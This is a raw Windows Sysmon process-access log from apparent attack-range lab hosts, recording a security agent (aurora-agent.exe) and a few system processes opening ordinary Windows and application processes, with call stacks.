12:23:34.932{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.930{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4A06-00000000AF02}1884C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.924{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.913{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.906{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044208Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.902{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044207Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044206Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.847{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044205Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044204Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.839{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044203Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.836{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044202Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044201Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044200Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.784{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044199Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044198Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.768{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044197Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.764{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044196Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.762{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044195Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.760{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044194Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.757{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044193Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044192Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044191Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.749{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044190Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044189Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.747{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044188Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.746{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044187Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.744{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3B00-00000000AF02}3500C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044186Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.229{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2C00-00000000AF02}1648C:\Windows\System32\vds.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000044185Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:34.228{FE4C2B44-DE08-63C7-F104-00000000AF02}60685608C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2A00-00000000AF02}2844C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013080190) 10341000x800000000000000016965Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4C6-63C7-1002-00000000B002}1000C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016964Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:34.386{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 